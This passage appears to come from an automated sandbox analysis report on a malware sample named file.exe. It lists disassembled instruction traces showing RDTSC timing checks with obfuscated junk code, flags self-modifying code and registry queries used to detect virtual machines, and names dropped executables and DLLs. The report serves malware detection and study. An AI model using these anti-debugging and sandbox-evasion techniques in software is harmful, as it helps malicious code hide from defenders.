Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0956 second address: 49F095C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F095C second address: 49F0960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0960 second address: 49F09CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FCBA4817E7Ch 0x0000000e mov dword ptr [esp], eax 0x00000011 pushad 0x00000012 mov ebx, esi 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FCBA4817E88h 0x0000001b and esi, 199B4558h 0x00000021 jmp 00007FCBA4817E7Bh 0x00000026 popfd 0x00000027 mov ebx, esi 0x00000029 popad 0x0000002a popad 0x0000002b lea eax, dword ptr [ebp-10h] 0x0000002e jmp 00007FCBA4817E82h 0x00000033 nop 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 mov si, bx 0x0000003a mov dh, 86h 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F09CA second address: 49F09D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F09D0 second address: 49F09F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E7Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCBA4817E7Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0A65 second address: 49F0A6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0A6B second address: 49F0AE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FCBA4817E7Ch 0x00000009 sub ecx, 2867D398h 0x0000000f jmp 00007FCBA4817E7Bh 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 test edi, edi 0x0000001a pushad 0x0000001b mov eax, ebx 0x0000001d popad 0x0000001e js 00007FCC16FE6AA3h 0x00000024 pushad 0x00000025 push edi 0x00000026 pop edx 0x00000027 mov di, si 0x0000002a popad 0x0000002b mov eax, dword ptr [ebp-0Ch] 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007FCBA4817E86h 0x00000035 adc eax, 6766D858h 0x0000003b jmp 00007FCBA4817E7Bh 0x00000040 popfd 0x00000041 mov ah, 59h 0x00000043 popad 0x00000044 mov dword ptr [esi+04h], eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FCBA4817E7Eh 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0AE6 second address: 49F0B31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea eax, dword ptr [ebx+78h] 0x0000000c pushad 0x0000000d mov al, E7h 0x0000000f mov bx, BC94h 0x00000013 popad 0x00000014 push 00000001h 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov al, A8h 0x0000001b pushfd 0x0000001c jmp 00007FCBA46BC741h 0x00000021 or ax, 6006h 0x00000026 jmp 00007FCBA46BC741h 0x0000002b popfd 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0B31 second address: 49F0BC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FCBA4817E87h 0x00000009 xor ecx, 50AA2F3Eh 0x0000000f jmp 00007FCBA4817E89h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FCBA4817E80h 0x0000001b or ax, 6C38h 0x00000020 jmp 00007FCBA4817E7Bh 0x00000025 popfd 0x00000026 popad 0x00000027 pop edx 0x00000028 pop eax 0x00000029 nop 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d pushfd 0x0000002e jmp 00007FCBA4817E7Bh 0x00000033 and si, 49FEh 0x00000038 jmp 00007FCBA4817E89h 0x0000003d popfd 0x0000003e mov dx, si 0x00000041 popad 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0BC4 second address: 49F0BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 9F5Eh 0x00000007 mov si, bx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCBA46BC747h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0BEB second address: 49F0C25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCBA4817E88h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0C25 second address: 49F0C29 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0C29 second address: 49F0C2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0CE4 second address: 49F0D41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [ebp-04h] 0x0000000c pushad 0x0000000d pushad 0x0000000e movzx ecx, bx 0x00000011 mov dx, 461Ah 0x00000015 popad 0x00000016 mov bx, A9E6h 0x0000001a popad 0x0000001b mov dword ptr [esi+08h], eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FCBA46BC746h 0x00000027 jmp 00007FCBA46BC745h 0x0000002c popfd 0x0000002d mov ebx, ecx 0x0000002f popad 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0D41 second address: 49F0D47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0D47 second address: 49F0D80 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebx+70h] 0x0000000e pushad 0x0000000f call 00007FCBA46BC744h 0x00000014 pop edx 0x00000015 mov bh, ch 0x00000017 popad 0x00000018 push 00000001h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d movsx ebx, ax 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0D80 second address: 49F0D87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0D87 second address: 49F0DA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 nop 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FCBA46BC741h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0DA1 second address: 49F0DD8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FCBA4817E81h 0x0000000f nop 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FCBA4817E7Dh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0DD8 second address: 49F0DDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0DDE second address: 49F0DE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0DE2 second address: 49F0DF7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 lea eax, dword ptr [ebp-18h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov si, 2F57h 0x00000012 push ecx 0x00000013 pop ebx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0DF7 second address: 49F0E0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA4817E84h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0E0F second address: 49F0E13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0E13 second address: 49F0E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0E22 second address: 49F0E26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0E26 second address: 49F0E3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0E3F second address: 49F0E45 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0E45 second address: 49F0E67 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E83h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0E67 second address: 49F0E6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0E6B second address: 49F0E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0EE3 second address: 49F0EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0EE9 second address: 49F0EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0EED second address: 49F0F2B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test edi, edi 0x0000000d pushad 0x0000000e movzx eax, di 0x00000011 jmp 00007FCBA46BC741h 0x00000016 popad 0x00000017 js 00007FCC16E8AECFh 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FCBA46BC73Dh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0F2B second address: 49F0F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0F31 second address: 49F0F64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC743h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [ebp-14h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FCBA46BC745h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F0F64 second address: 49F1025 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, esi 0x0000000b pushad 0x0000000c jmp 00007FCBA4817E7Ch 0x00000011 push esi 0x00000012 pushfd 0x00000013 jmp 00007FCBA4817E81h 0x00000018 sbb ecx, 107C2946h 0x0000001e jmp 00007FCBA4817E81h 0x00000023 popfd 0x00000024 pop eax 0x00000025 popad 0x00000026 mov dword ptr [esi+0Ch], eax 0x00000029 jmp 00007FCBA4817E87h 0x0000002e mov edx, 772406ECh 0x00000033 pushad 0x00000034 mov ax, A4FBh 0x00000038 pushfd 0x00000039 jmp 00007FCBA4817E80h 0x0000003e add eax, 7476C848h 0x00000044 jmp 00007FCBA4817E7Bh 0x00000049 popfd 0x0000004a popad 0x0000004b sub eax, eax 0x0000004d push eax 0x0000004e push edx 0x0000004f pushad 0x00000050 mov di, cx 0x00000053 pushfd 0x00000054 jmp 00007FCBA4817E7Ch 0x00000059 sbb ecx, 709C0AA8h 0x0000005f jmp 00007FCBA4817E7Bh 0x00000064 popfd 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1025 second address: 49F1048 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, si 0x00000006 jmp 00007FCBA46BC740h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e lock cmpxchg dword ptr [edx], ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1048 second address: 49F104C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F104C second address: 49F1050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1050 second address: 49F1056 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1056 second address: 49F10C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC744h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a jmp 00007FCBA46BC740h 0x0000000f test eax, eax 0x00000011 pushad 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FCBA46BC743h 0x00000019 add si, 4B5Eh 0x0000001e jmp 00007FCBA46BC749h 0x00000023 popfd 0x00000024 popad 0x00000025 popad 0x00000026 jne 00007FCC16E8AD5Ah 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F10C4 second address: 49F10C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F10C8 second address: 49F10DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC742h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F120E second address: 49F126B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+0Ch], eax 0x0000000c jmp 00007FCBA4817E7Eh 0x00000011 mov eax, dword ptr [esi+10h] 0x00000014 jmp 00007FCBA4817E80h 0x00000019 mov dword ptr [edx+10h], eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FCBA4817E87h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F126B second address: 49F1321 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC749h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+14h] 0x0000000c jmp 00007FCBA46BC73Eh 0x00000011 mov dword ptr [edx+14h], eax 0x00000014 pushad 0x00000015 movzx eax, bx 0x00000018 pushfd 0x00000019 jmp 00007FCBA46BC743h 0x0000001e adc ax, A69Eh 0x00000023 jmp 00007FCBA46BC749h 0x00000028 popfd 0x00000029 popad 0x0000002a mov eax, dword ptr [esi+18h] 0x0000002d pushad 0x0000002e mov cx, 7603h 0x00000032 pushfd 0x00000033 jmp 00007FCBA46BC748h 0x00000038 adc cx, 97C8h 0x0000003d jmp 00007FCBA46BC73Bh 0x00000042 popfd 0x00000043 popad 0x00000044 mov dword ptr [edx+18h], eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FCBA46BC745h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1321 second address: 49F1331 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCBA4817E7Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1331 second address: 49F136D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esi+1Ch] 0x0000000b jmp 00007FCBA46BC747h 0x00000010 mov dword ptr [edx+1Ch], eax 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FCBA46BC745h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F136D second address: 49F1394 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E81h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esi+20h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FCBA4817E7Dh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1394 second address: 49F13F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+20h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f call 00007FCBA46BC743h 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007FCBA46BC749h 0x0000001b sub ah, FFFFFFC6h 0x0000001e jmp 00007FCBA46BC741h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F13F3 second address: 49F1435 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FCBA4817E83h 0x0000000b adc ah, FFFFFFFEh 0x0000000e jmp 00007FCBA4817E89h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [esi+24h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1435 second address: 49F1439 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1439 second address: 49F143F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F143F second address: 49F1445 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1445 second address: 49F1449 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1449 second address: 49F1477 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+24h], eax 0x0000000e jmp 00007FCBA46BC740h 0x00000013 mov eax, dword ptr [esi+28h] 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1477 second address: 49F1494 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1494 second address: 49F1588 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC741h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+28h], eax 0x0000000c pushad 0x0000000d movzx eax, dx 0x00000010 mov eax, edi 0x00000012 popad 0x00000013 mov ecx, dword ptr [esi+2Ch] 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FCBA46BC741h 0x0000001d xor cx, B806h 0x00000022 jmp 00007FCBA46BC741h 0x00000027 popfd 0x00000028 jmp 00007FCBA46BC740h 0x0000002d popad 0x0000002e mov dword ptr [edx+2Ch], ecx 0x00000031 jmp 00007FCBA46BC740h 0x00000036 mov ax, word ptr [esi+30h] 0x0000003a pushad 0x0000003b pushfd 0x0000003c jmp 00007FCBA46BC73Eh 0x00000041 add cx, 4908h 0x00000046 jmp 00007FCBA46BC73Bh 0x0000004b popfd 0x0000004c pushfd 0x0000004d jmp 00007FCBA46BC748h 0x00000052 jmp 00007FCBA46BC745h 0x00000057 popfd 0x00000058 popad 0x00000059 mov word ptr [edx+30h], ax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 mov ax, di 0x00000063 pushfd 0x00000064 jmp 00007FCBA46BC73Fh 0x00000069 jmp 00007FCBA46BC743h 0x0000006e popfd 0x0000006f popad 0x00000070 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1588 second address: 49F15E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA4817E89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ax, word ptr [esi+32h] 0x0000000d jmp 00007FCBA4817E7Eh 0x00000012 mov word ptr [edx+32h], ax 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FCBA4817E7Eh 0x0000001d sub cx, 0DB8h 0x00000022 jmp 00007FCBA4817E7Bh 0x00000027 popfd 0x00000028 push eax 0x00000029 push edx 0x0000002a mov di, si 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F15E1 second address: 49F162F instructions: 0x00000000 rdtsc 0x00000002 mov di, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov eax, dword ptr [esi+34h] 0x0000000b jmp 00007FCBA46BC73Ch 0x00000010 mov dword ptr [edx+34h], eax 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007FCBA46BC73Dh 0x0000001a or al, 00000006h 0x0000001d jmp 00007FCBA46BC741h 0x00000022 popfd 0x00000023 popad 0x00000024 test ecx, 00000700h 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d mov bh, 89h 0x0000002f mov di, cx 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F162F second address: 49F1635 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1635 second address: 49F1639 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F1639 second address: 49F169A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007FCC16FE5F4Ch 0x0000000e jmp 00007FCBA4817E7Fh 0x00000013 or dword ptr [edx+38h], FFFFFFFFh 0x00000017 pushad 0x00000018 pushad 0x00000019 mov esi, 06740FA1h 0x0000001e pushfd 0x0000001f jmp 00007FCBA4817E7Eh 0x00000024 adc ax, 1738h 0x00000029 jmp 00007FCBA4817E7Bh 0x0000002e popfd 0x0000002f popad 0x00000030 movzx ecx, di 0x00000033 popad 0x00000034 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FCBA4817E7Eh 0x0000003f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 49F169A second address: 49F16ED instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCBA46BC73Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 or dword ptr [edx+40h], FFFFFFFFh 0x0000000d jmp 00007FCBA46BC746h 0x00000012 pop esi 0x00000013 pushad 0x00000014 mov di, ax 0x00000017 mov ch, C1h 0x00000019 popad 0x0000001a pop ebx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e push edx 0x0000001f mov bx, si 0x00000022 pop eax 0x00000023 popad 0x00000024 leave 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007FCBA46BC743h 0x0000002e rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 4739DC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 69E98A instructions caused by: Self-modifying code
Contains capabilities to detect virtual machines
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion Jump to behavior
Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\file.exe Code function: 1_2_005F2B1C rdtsc 1_2_005F2B1C
Found dropped PE file which has not been started or loaded
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Bunifu_UI_v1.5.3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\dll[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\soft[1] Jump to dropped file
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\23RE4w32fN\Y-Cleaner.exe Jump to dropped file
